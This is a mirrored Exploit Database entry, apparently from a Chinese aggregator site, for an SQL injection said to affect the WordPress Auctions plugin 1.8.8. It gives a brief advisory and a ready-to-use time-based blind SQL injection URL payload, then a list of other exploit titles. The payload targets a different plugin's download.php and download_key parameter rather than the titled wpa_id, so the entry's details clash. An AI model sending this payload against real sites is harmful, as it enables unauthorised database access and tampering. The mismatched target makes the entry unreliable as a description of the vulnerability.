WordPress Plugin Auctions 1.8.8 – ‘wpa_id’ SQL Injection

Exploit Database
114 阅读

作者： sherl0ck_

日期： 2011-09-14
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/36135/

source: https://www.securityfocus.com/bid/49625/info

Auctions plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Owen Cutajar Auctions versions 1.8.8 and prior are vulnerable.

http://www.example.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

last Exploits
WordPress Plugin Auctions 1.8.8 – ‘wpa_id’ SQL Injection的更多信息

WordPress Plugin Crayon Syntax Highlighter – ‘wp_load’ Remote File Inclusion：
Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)：
Andy’s PHP KnowledgeBase 0.95.4 – SQL Injection：
Pimcore CMS Build 3450 – Directory Traversal：
Symantec Web Gateway 5.0.3.18 – Blind SQL Injection Backdoor via MySQL Triggers：
WordPress Plugin Jibu Pro 1.7 – Cross-Site Scripting：
MyBB 1.6.8 – ‘member.php’ SQL Injection：
Site2Nite Business eListings – SQL Injection：